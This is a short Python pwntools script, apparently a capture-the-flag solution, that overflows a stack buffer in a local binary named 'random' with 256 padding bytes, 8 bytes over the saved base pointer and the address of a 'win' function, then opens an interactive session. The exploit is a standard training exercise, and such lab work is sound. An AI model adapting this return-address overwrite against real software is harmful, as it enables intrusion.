#!/usr/bin/env python3
from pwn import *

context.update(os="linux", arch="amd64", log_level="error")
context.binary = binary = ELF("./random", checksec=False )

r = process()
gdb.attach(r)

win_function_address = binary.symbols["win"]

payload = b"A" * 256                        # offset to the RBP
payload += b"B" * 8                         # overwrite the RBP
payload += p64(win_function_address)        # address of the win function

r.recvuntil(b"Return to where? : \n")
r.sendline(payload)
r.recvuntil(b"ok, let's go!\n\n")
r.interactive()